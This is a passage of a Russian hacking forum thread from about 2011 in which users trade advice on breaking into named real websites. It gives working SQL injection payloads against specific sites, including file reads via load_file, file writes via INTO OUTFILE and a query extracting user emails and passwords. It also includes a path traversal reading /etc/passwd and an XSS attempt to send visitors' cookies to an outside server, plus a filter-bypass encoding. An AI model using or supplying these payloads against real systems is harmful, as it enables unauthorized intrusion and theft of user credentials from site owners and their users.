Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Для просмотра файлов при ограничении вывода можно использовать запрос вида
    Code:
    select substring(load_file('/patch/to/file/file.conf'),1,100)
    Где первая цифра - символ, с которого начинать вывод, вторая - количество выводимых символов

    Просматривать содержимое каталогов через load_file можно только, если сервер стоит на FreeBSD. В других случаях это невозможно. Выполнять какие-то ни было команды через load_file также невозможно.
     
    3 people like this.
  2. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Если работает лоадфайл, попробуй записать через INTO OUTFILE, если знаешь полный путь и есть куда записать (путь можно узнать, читая конфиг Апача, если найдешь).
     
    _________________________
  3. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    т.к. он мне написал что пришлось захексить(насколько я понял), то into+outfile не прокатит
     
    1 person likes this.
  4. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Хз, я не заметил это че-то, либо он это тебе в ПМ написал.
    Тогда конечно.
     
    _________________________
  5. killrok6

    killrok6 New Member

    Joined:
    30 Jul 2010
    Messages:
    33
    Likes Received:
    3
    Reputations:
    0
    Нашел на одном сайте уязвимость, но при вставлении ковычки он выводит код на белом фоне :
    т.е SELECT * FROM subgrp WHERE sts = 1 and grp = 5\'

    На сайте: http://autolv.com/index.php?grp_id=3'

    Что делать?

    И вот недавно наткнулся на одном сайте было что подобрал поля, но не где не выводиться инфа

    http://asg.lv/index.php?mlng=5&mmen_id=4+union+select+1,2,3,4,5,6,7,8,9,10,11

    Почему?

    Заранее Спасибо
     
  6. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Логично же - не вставлять кавычку :)
    И в этом конкретном примере вывод получить не удастся из-за двух запросов, выполняющихся подряд:
    Code:
    SELECT * FROM grp_des WHERE type = 'mgr' and grp_id =6 and lang='lang2'
    Code:
    SELECT * FROM subgrp WHERE sts = 1 and grp = 6 
    Успешно можно раскрутить скулю вот тут, например:
    Code:
    http://autolv.com/index.php?item_id=52

    Я думаю оно работает так:

    Представим 2 запроса.
    Причем один из них фильтруется, а второй нет.
    В оба запроса передается один и тот же параметр
    Результаты первого запроса выводятся на экран, а второго - нет.
    Поэтому мы можем подобрать количество полей.
    Но вывод получить не удастся.
    Хотя есть некая странность, и
    Code:
    mmen_id=4-2
    работает, при условии, что
    Code:
    mmen_id=if(1,2,3)
    работать отказывается. Этого я объяснить не могу(
     
    #16026 kamaz, 5 Feb 2011
    Last edited: 5 Feb 2011
  7. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    Прошу помощи

    http://stomjob.ru/index.php?sub=search_vacbyid

    В поле ID вакансии подставляем '
    Получаем Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
    Помогите подобрать поля ;)
     
  8. Zalepoks

    Zalepoks New Member

    Joined:
    2 Feb 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://ontarioworld.ru/usercp/store/prem.php?p=javajavascriptscript:alert%28%20String.fromCharCode%28120,115,115%29%29

    Может мне ктонить разяснить, что сделать здесь дальше ?
     
  9. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    http://stomjob.ru/index.php?sub=show_vacancybyid
    POST:
    Code:
    vacby_id=1 union select 1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 1
    Либо можно вбить
    Code:
    1 union select 1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 1
    В поле поиска вакансии

    При этом запросе надо посмотреть внимательно на ошибку:
    Code:
    Warning: include_once(store/javajavascriptscript:alert(String.fromCharCode(120,115,115)).php
    Где текст ошибки говорит сам за себя.
     
    2 people like this.
  10. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    а если true что далше?
     
  11. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Code:
    http://ontarioworld.ru/usercp/store/prem.php?p=../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
    Мб подумать чуть-чуть? Ты второй похожий инлкюд за 3 дня выкладываешь, впредь тебе никто не будет крутить их,ибо самому думать надо!!!111
    И зачем ты туда алерт впихивал ?о_О
    Мб прочтешь уже что-нибудь, а то так и будешь задавать вопросы =/

    Везде по-разном, где-то такой метод отсечения не сработует,где-то сработует. Вообще,если нулбайт не поддается экранизированию, то геморой с етим делать не надо,но этот случай как раз второй =/

    Речь шла не о перемещение по каталогам ../ а про отброс расширения,т.к. там нулбайт поддается экранизированию, кароче если не понимаешь о чем вопрос,не надо пытаться ответить, темболее что я выше уже ответил.
     
    #16031 ~d0s~, 5 Feb 2011
    Last edited: 9 Feb 2011
    1 person likes this.
  12. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    ~d0s~, как ты узнал сколько ././././ вставлять?
     
  13. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Путь посмотрел и посчитал вложенность.
     
    _________________________
  14. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    Добрый вечер. Вот такая трабла, в пасивном XSS фильтрируется ">"

    Вот код, показывает куки:

    id=348532&returnto=><img src="themes/Industrial/images/donor_4.png" onload="javascript:alert(document.cookie)"

    Код работает потому-что там 1 знак ">" уже есть. А как отправить куки на моем сервере? <script src=http://hack.me/script.js></script> не пашет, так как используется ">" дважды
     
  15. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    в каждом отдельном случае надо смотреть как обойти фильтр, как правило надо смотреть обрезается только > или полностью код, панацеи тут нет как вариант помогает закодировать строку ну например строку <script>alert(document.cookie)</script> полностью заменяет такой код data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
    как видиш в нем не содержиться символа >
    вобщем нельзя что то советовать , не видя конкретного сайта с уязвимостью
     
    2 people like this.
  16. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    https://forum.antichat.ru/thread98525.html
    Для кого тему прилепили?
     
    1 person likes this.
  17. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Да, конечно спасибо за то что искать направили. Поискал ещё часок. Никакого софта не нашел.
    Проблема вот в чем:
    Делаю ручками
    LIMIT 0,1--
    LIMIT 1,1--
    LIMIT 2,1--
    А это не совсем оптимально. Не удобно работать и времени много забирает.
    Есть спец. софт который сам переберет базу и выведет все строки в удобном визуальном формате?
    Нашел что то подобное. sql helper а ссылки все битые.
     
  18. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    может кто знает про это я ниче норм не нашел
    Drupal Droptor Module SQL Injection Vulnerability
    http://secunia.com/advisories/43179
     
  19. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Я не просто отправил в поиск, а еще и дал ссылку на топик
    https://forum.antichat.ru/showthread.php?t=240692
    Как вариант, пробуй rsaUnDumper[sql] – универсальный дампер SQL INJECTION.
     
  20. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    rsaundumper хорошо работает многопоточно, но там не поддерживается(может пока) запросы через POST инъекций
    А если GETом то вот таких уж точно не признает

    555555' UNION ALL SELECT 1,2,(SELECT concat(0x7e,0x27,unhex(Hex(cast(user.EMAIL as char))),0x5e,unhex(Hex(cast(user.PASSWORD as char))),0x27,0x7e) FROM `db`.user LIMIT 10000,1) -- a
     
    #16040 YuNi|[c, 7 Feb 2011
    Last edited: 7 Feb 2011
Thread Status:
Not open for further replies.